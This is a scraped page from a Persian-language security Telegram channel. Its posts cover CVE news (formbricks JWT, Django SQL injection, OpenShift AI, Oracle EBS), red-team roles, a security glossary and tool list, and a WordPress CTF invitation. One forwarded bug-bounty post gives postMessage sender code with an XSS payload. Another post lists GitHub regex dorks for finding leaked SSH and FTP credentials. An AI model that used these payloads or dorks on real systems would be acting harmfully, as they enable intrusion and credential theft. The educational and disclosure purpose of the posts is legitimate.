RadvanSec – Telegram
RadvanSec
990 subscribers
181 photos
27 videos
142 files
595 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
Forwarded from GO-TO CVE (| | Sharo K h | |)
سرویس اوپن سورس formbricks یه cve خورده
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors

حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه


export const verifyToken = async (token: string): Promise<JwtPayload> => {
// First decode to get the ID
const decoded = jwt.decode(token);
const payload: JwtPayload = decoded as JwtPayload;


https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4

#CVE-2025-59934
5
Forwarded from Bugbountyhints
امروز داشتم یه ریپورتی در رابطه با postMessage میخوندم که دوست داشتم که اینجا بازش کنم :
ما یه همچین listener ای رو داریم :
Receiver: function (e) {
var n, r = this.get("replaceRoute"), i = this.get("referrer");
if (!i || e.origin === normalize(i)) {
try { n = JSON.parse(e.data); } catch (u) {}
// ...
}
}

خب حالا مشکل این listener چیه ؟ توی این قسمت if (!i داره چک میکنه که اگه referrer خالی باشه این شرط پاس بشه و مشکلی نداره پس اگه referrer ما خالی باشه دیگه به شرط بعدی e.origin نمیرسه و نکته مهمی که اینجا هست اینه که توی postMessage هیچ هدر referrer ای ست نمیشه پس اگه من یه sender داشته باشم به راحتی میتونم به اینجا Message بفرستم.
پس کد sender ما میشه :
win = window.open("https://transact.victim.com/");
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "application_error",
model: { error: 500, noscript: "injected", message: "from attacker" }
}), "*");

حالا تو ادامه اش هم اومده بود یه route دیگه پیدا کرده بود که اونجا xss میخورد :
win.postMessage(JSON.stringify({
action: "replaceRoute",
route: "voucher.multi-product-details",
model: {
eligible: true,
sku: {
id: 0, longDenoscription: `
<img src=x onerror='alert(document.domain)'>`
}
}
}), "*");
7🤣2
Pentesting Active Directory-Final.pdf
31.1 MB
ترجمه کتاب Pentesting Active Directory

⭐️ @ZeroSec_team
7🤣1
⚠️ 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗶𝗻 𝗗𝗷𝗮𝗻𝗴𝗼 𝗙𝗿𝗮𝗺𝗲𝘄𝗼𝗿𝗸
The Django library has announced a very critical vulnerability (CVE-2025-57833) that allows attackers to perform SQL Injection on servers using the framework

🔍 𝗪𝗵𝗮𝘁 𝗵𝗮𝗽𝗽𝗲𝗻𝗲𝗱?
• The flaw is in the FilteredRelation component inside the ORM.
• An attacker can exploit it by passing a specially crafted dictionary to QuerySet.annotate() or QuerySet.alias().
• Result: SQL Injection = ability to manipulate queries, access sensitive data, or even take full control of the server.

⚠️ 𝗔𝗳𝗳𝗲𝗰𝘁𝗲𝗱 𝘃𝗲𝗿𝘀𝗶𝗼𝗻𝘀:
• Django 5.2
• Django 5.1
• Django 4.2 (LTS)
• And also the main development branch.

🛡️ 𝗪𝗵𝗮𝘁’𝘀 𝘁𝗵𝗲 𝘀𝗼𝗹𝘂𝘁𝗶𝗼𝗻?
Immediate update required to:
• Django 5.2.6
• Django 5.1.12
• Django 4.2.24
-
#CyberSecurity
#Django
#SQLInjection
#CVE2025

⭐️ @ZeroSec_team
👍53
نقش ‌ها و مسئولیت ‌ها در Red Team Engagement

برای اجرای درست یه تست Red Team فقط داشتن تیم حمله کافی نیست.
باید نقش ‌ها و مسئولیت ‌های مختلف به ‌درستی تعریف و انتخاب بشن این کار معمولاً توسط مدیریت سازمان (CISO/CIO) و Engagement Control Group (ECG) انجام میشه.

Red Team :
Red Team Lead مسئول کل عملیات، هماهنگی با ECG/White Cell، تهیه گزارش نهایی
Red Team Operators اجراکننده‌ی حملات


Blue Team :
تیم دفاع سازمان (SOC/IT Security) که ممکنه مطلع باشند یا نباشند (Announced ,Unannounced)


White Cell :
نقش ناظر و یا داور که وظیفه اجرای ROE و همبستگی برای جلوگیری از آسیب واقعی کند (بدون کمک به Blue Team)


Engagement Control Group (ECG) :
تیم تصمیم گیرنده اعضا مدیران ارشد (CIO,CISO,COO) یک نماینده IT , نماینده White Cell , نماینده RedTeam وظیفه تصویب اهداف دامنه تایم لاین قوانین و تصمیم گیری درمورد اطلاع رسانی operation به BlueTeam و انتخاب TA ها


Trusted Agent (TA) :
فرد مورد اعتماد داخل سازمان که وظیفه جلوگیری از آسیب جدی به داده / زیرساخت و کارکنان را دارد اطلاعات محرمانه دارد ولی نباید چیزی به Blue Team بده مگر با تایید ECG


Observers :
فقط برای مستند سازی هیچ دخالتی در عملیات ندارند


⭐️ @ZeroSec_team
4👍2👏1
osint-techniques-resources.pdf
40.2 MB
نویسنده خودش سابقۀ FBI داره و روش ‌هاش هم کاربردی و هم قانونی هستن

⭐️ @ZeroSec_team
7
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:

/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/


⭐️ @ZeroSec_team
4🔥2👏1
فقط اونایی که قضیه رو میدونن🤣🤣🤣🤣
🤣6🗿4🤡2
اگه دوس داشتید دنبال کنندگان شما هم جزیی از این چالش باشند میتونید این پست رو به انتشار بزارید❤️🙏🏼


https://www.instagram.com/p/DPQrtnjjUS8/?igsh=MW9zejR5M2t3bGNyaw==
👌2❤‍🔥1
🔴 خلاصه‌ای از 10 سال اخیر ایران ؛

تحریم
کرونا
دلار
طلا
جنگ
مکانیسم ماشه
آب
برق
زلزله
سیل
خشکسالی
اسکم های Bugcrowd

🔁این لیست آپدیت میشه
🤣20💔51
Forwarded from HackMeLocal
🕹 مینی‌چالش روی وردپرس!

همیشه لازم نیست از راه سخت دسترسی بگیریم!
بیشتر حمله‌هایی که صورت میگیره از یک دسترسی ساده شروع میشه که به خاطر یک اشتباه کوچیک اطلاعات اون دسترسی لو رفته. ( شب دارکی شد ... )

برای نشون دادن اهمیت این چالش طراحی شده ( لازم بگم با تغییرات جزئی مثل همین باگ روی یک پلتفرم باگ بانتی گزارش شده که بعد از کشف حتما داخل کانال توضیح میدیم ):

ما بروزترین نسخه وردپرس نصب کردیم، سپس یک WAF سر راه اون قرار دادیم اما در یک اقدامی عجیب بدون حتی یک خطا یک هکر وارد وبسایت ما شد.

⚠️ این حمله تقریبا چند دقیقه بعد از اینکه اولین ویدیو داخل وبسایت آپلود شد صورت گرفت نکته عجیب اینکه ما حتی این ویدیو را در پست‌هایمان استفاده نکردیم !!

🔗آدرس وبسایت ما:
https://wp1.hackmelocal.com


#BugBounty #Wordpress #Vulnrability #CTF #HackMeLocal #InformationLeak

@HackMeLocal
3
🔹 یه گروه هکری به اسم Nimbus Manticore که میگن به ایران وصله، شروع کرده به زدن شرکت‌های اروپایی (دفاعی، مخابراتی، هوافضا).
🔹 با ایمیل‌های فیشینگ (مثلاً آگهی استخدام جعلی) آدمارو گول می‌زنن، بعد بدافزار میریزن.
🔹 دو تا ابزار اصلی دارن:

MiniJunk → بک‌دور برای کنترل سیستم قربانی

MiniBrowse → دزدی اطلاعات کاربری/مرورگر
🔹 برای مخفی شدن هم از کد پیچیده و گواهی دیجیتال جعلی استفاده می‌کنن.


ابزارهای اصلی‌ای که به کار می‌برن:
• MiniJunk — یک backdoor پنهان که به هکرها اجازه می‌ده کنترل دستگاه قربانی رو بگیرن، فایل آپلود یا دانلود کنن و کارای دیگه
• MiniBrowse — یه ابزار سبک برای دزدی اطلاعات کاربری (مثل اطلاعاتی که توی مرورگرها ذخیره شده)

برای پنهان شدن بیشتر، از روش‌های «ابهام‌زایی» (obfuscation) استفاده می‌کنن؛ یعنی کدها رو طوری می‌نویسن که تحلیلش برامون سخت باشه. همچنین از گواهی‌های دیجیتال جعل‌شده استفاده شده برای اینکه بدافزار دیده نشه یا مشکوک نباشه.

این گروه قبلاً هم تحت نام UNC1549 شناسایی شده بوده و ارتباطاتی با سپاه پاسداران انقلاب اسلامی ایران داره.


⭐️ @ZeroSec_team
🔥63
یه باگ خیلی خفن تو Red Hat OpenShift AI پیدا شده، اسمش هم CVE-2025-10725
داستانش اینه که یکی از رول‌ها (ClusterRoleBinding) خیلی باز تنظیم شده بوده، یعنی هرکی لاگین کنه (هر کاربر ساده‌ی اوپن‌شیفت) می‌تونه بره خودشو قاطی مدیرای کل سیستم (cluster-admin) کنه! 😳

یعنی تو عمل:
یکی اگه یه یوزر عادی هم داشته باشه، می‌تونه با یه سری درخواست API کارای خطرناک بکنه → پاد بسازه، جاب بزنه، بعدش یواش یواش کنترل کل کلاستر رو بگیره.

📌 نکات مهم:

امتیاز CVSS: ۹.۹ → فوق‌العاده بحرانی.

شرط لازم: باید قبلاً لاگین کرده باشی (یه یوزر یا توکن لو رفته باشه).

نتیجه: اگه اکسپلویت بشه، دیگه فاتحه‌ی کل سیستم AI و دیتاهایی که روشه خونده‌ست.


راه‌حل:

سریع آپدیت کنی (پچ جدید داده شده).


اون رول اشتباه (kueue-batch-user-role روی گروه system:authenticated) رو حذف کنی.


مجوز ساخت job/pod فقط دست کاربرای قابل اعتماد باشه.


لاگ‌ها رو چک کنی که کسی مشکوک دست‌کاری نکرده باشه.

⭐️ @ZeroSec_team
🔥81
Media is too big
VIEW IN TELEGRAM
Reddit OSINT

⭐️ @Zerosec_team
5
This media is not supported in your browser
VIEW IN TELEGRAM
اوراکل پچ اضطراری برای CVE-2025-61882
یک آسیب‌پذیری بحرانی در Oracle E-Business Suite که بدون احراز هویت امکان اجرای کد از راه دور را می‌داد، توسط گروه Cl0p سوءاستفاده شده بود. اوراکل پچ اضطراری منتشر کرده است.
Cyber Security Agency of Singapore

این آسیب‌پذیری دارای امتیاز CVSS = 9.8 گزارش شده است.

⭐️ @Zerosec_team
🔥4
چطور SOAR تیم امنیت رو از آشفتگی نجات می‌ده؟


توی هر SOC، هشدارهای زیادی ایجاد میشه، هر لحظه یه تهدید، یه IP مشکوک، یه هش فایل ناشناس.
تحلیلگرها هم خسته می‌شن، خطا بالا می‌ره، و زمان پاسخ دهی طولانی می‌شه.
اینجاست که SOAR وارد می‌شه
"یه مغز خودکار برای امنیت سایبری"
SOAR یعنی Orchestration، Automation و Response؛ یعنی هماهنگی، خودکارسازی و واکنش. SOAR با اتصال به صدها ابزار امنیتی، کارهایی مثل بررسی IP، بلاک آدرس، یا تریاژ ایمیل رو خودش انجام می‌ده.
هر رویداد یه «container» می‌شه، هر اقدام یه «playbook». تصمیم‌گیری سریع‌تر، مستندسازی دقیق‌تر، و خطای انسانی کمتر.
در نتیجه:
تیم SOC از حالت واکنشی درمیاد و به حالت «پیش‌دستانه» می‌رسه.
و وقتی تهدیدی به وجود میاد، SOAR از قبل آمادست.

⭐️ @ZeroSec_team
5
۱) واژه‌نامهٔ مختصر (اصطلاحات کلیدی)

IOC (Indicator of Compromise)
نشانه یا اثری که ثابت می‌کند نفوذ یا حمله‌ای اتفاق افتاده (مثل IP مخرب، hash فایل، تغییر رجیستری).

TTPs (Tactics, Techniques, Procedures)
تاکتیک‌ها، تکنیک‌ها و رویه‌های یک عامل تهدید؛ یعنی روش کلی و گام‌هایی که مهاجم استفاده می‌کند.

Red Team / Blue Team / Purple Team
Red Team = تیم حمله‌کننده شبیه‌سازی تهدید؛ Blue Team = تیم دفاع (SOC، IR)؛ Purple = هماهنگ‌سازی و یادگیری بین آن‌ها.

SIEM (Security Information and Event Management)
ابزار/سیستم جمع‌آوری، نرمال‌سازی، ارتباط‌سنجی و هشداردهی از لاگ‌ها و رخدادها (برای شناسایی حمله).

DLP (Data Loss Prevention)
جلوگیری از خروج یا نشت داده‌های حساس (مسدودسازی یا هشدار هنگام تلاش برای ارسال اطلاعات محرمانه).

EDR (Endpoint Detection and Response)
عامل (agent) روی endpointها که رفتار فرآیندها/فایل‌ها/شبکه را مانیتور و هشدار و قابلیت واکنش فراهم می‌کند.

XDR (Extended Detection and Response)
توسعه EDR که داده‌ها را از endpoint، شبکه، ایمیل و ابری یکپارچه می‌کند.

IDS / IPS (Intrusion Detection/Prevention System)
IDS هشدار می‌دهد وقتی الگوی حمله دید؛ IPS می‌تواند ترافیک را مسدود کند.

NIDS / NIPS
نسخهٔ شبکه‌ای IDS/IPS (حسگری که ترافیک شبکه را می‌بیند).

SOAR (Security Orchestration, Automation and Response)
اتوماسیون پاسخ حادثه و اجرای playbookها (مثلاً وقتی SIEM آلارم داد، مجموعه‌ای از اقدامات خودکار اجرا شود).

UEBA (User and Entity Behavior Analytics)
تحلیل رفتار کاربران/ماشین‌ها برای تشخیص آنومیالی‌ها (مثلاً کاربری که ناگهان مقدار زیادی دیتا می‌خواند).

NetFlow / PCAP
NetFlow = خلاصهٔ جریان‌های ترافیکی؛ PCAP = ضبط کامل بسته‌ها برای تحلیل عمیق.

MFA (Multi-Factor Authentication)
احراز هویت چندعاملی (چیزی که می‌دانی + چیزی که داری یا بیومتریک).

Exfiltration
خروج داده‌ها از شبکه به بیرون (دزدیدن داده).

C2 / C&C (Command and Control)
سروری که مهاجم با آن کانال برقرار می‌کند تا کامند بفرستد و داده بگیرد.

OSINT (Open-Source Intelligence)
جمع‌آوری اطلاعات از منابع باز (وب، شبکه‌های اجتماعی، WHOIS و...) برای شناسایی هدف.

⭐️ @ZeroSec_team
3
۲) دسته‌بندی ابزارها / برنامه‌ها و کاربردشان (دفاعی — تهاجمی)

هشدار: ابزارهای هک/رد تیم می‌توانند دوبُعدی (dual-use) باشند — آموزش درباره‌شان مجاز است، اما ارائهٔ دستورالعمل اجرایی برای نفوذ غیرقانونی مجاز نیست.

ابزارهای دفاعی (معمولاً در SOC استفاده می‌شوند)

Splunk (Enterprise Security) — SIEM تجاری و قوی، جستجو و داشبورد و correlation.

IBM QRadar — SIEM سازمانی با قابلیت‌های تحلیلی قوی.

Microsoft Sentinel — SIEM ابری در اکوسیستم مایکروسافت.

Elastic Stack (ELK + Elastic SIEM) — ELK برای لاگ و تحلیل؛ نسخهٔ SIEM قابل‌سفارشی‌سازی.

ArcSight, AlienVault (OSSIM) — دیگر محصولات SIEM (برخی اوپن‌سورس).

CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint — EDRهای معروف.

Palo Alto Cortex XDR, VMware Carbon Black — XDR/EDR.

Snort / Suricata — NIDS اوپن‌سورس برای شناسایی الگوهای ترافیکی.

Tenable (Nessus), Qualys — اسکن آسیب‌پذیری.

Forcepoint / Symantec DLP / Microsoft Purview DLP — محصولات DLP.

SIEM + SOAR combos (مثلاً Splunk Phantom, Demisto) — اتوماسیون پاسخ حادثه.

ابزارها و مفاهیم مورد استفاده توسط Red Team (مثالی، بدون جزئیات سوءاستفاده)

Cobalt Strike — پلتفرم شبیه‌سازی حمله و C2 تجاری (ابزاری حرفه‌ای که در محیط‌های قانونی استفاده می‌شود اما گاهی مورد سوءاستفاده قرار می‌گیرد).

Metasploit Framework — فریم‌ورک تست نفوذ و اثبات مفهوم (برای آزمایش و آموزشی).

Meterpreter (بخشی از Metasploit) — پوستهٔ تعاملی روی ماشین قربانی.

Mimikatz — ابزار استخراج credentialها از حافظه (ابزاری برای تست قدرت دفاعی؛ استفادهٔ غیرمجاز جرم است).

Empire, PowerShell Empire — فریم‌ورک post-exploitation با محور PowerShell.

sqlmap — ابزار شناخته‌شده تست تزریق SQL (تذکر: فقط برای تست در محیط مجاز).

nmap — اسکنر پورت و کشف سرویس‌ها.

Burp Suite — ابزار تست نفوذ وب (pro و community).

Responder — ابزاری برای سوءاستفاده از پروتکل‌های نام‌گذاری شبکه محلی (testing/awareness).

BloodHound — تحلیل ساختار Active Directory و مسیرهای privilege escalation.
(تذکر: Red Team ها معمولاً ابزارها را بازکامپایل/پیکربندی می‌کنند تا IOCها را کنترل کنند.)

⭐️ @ZeroSec_team
3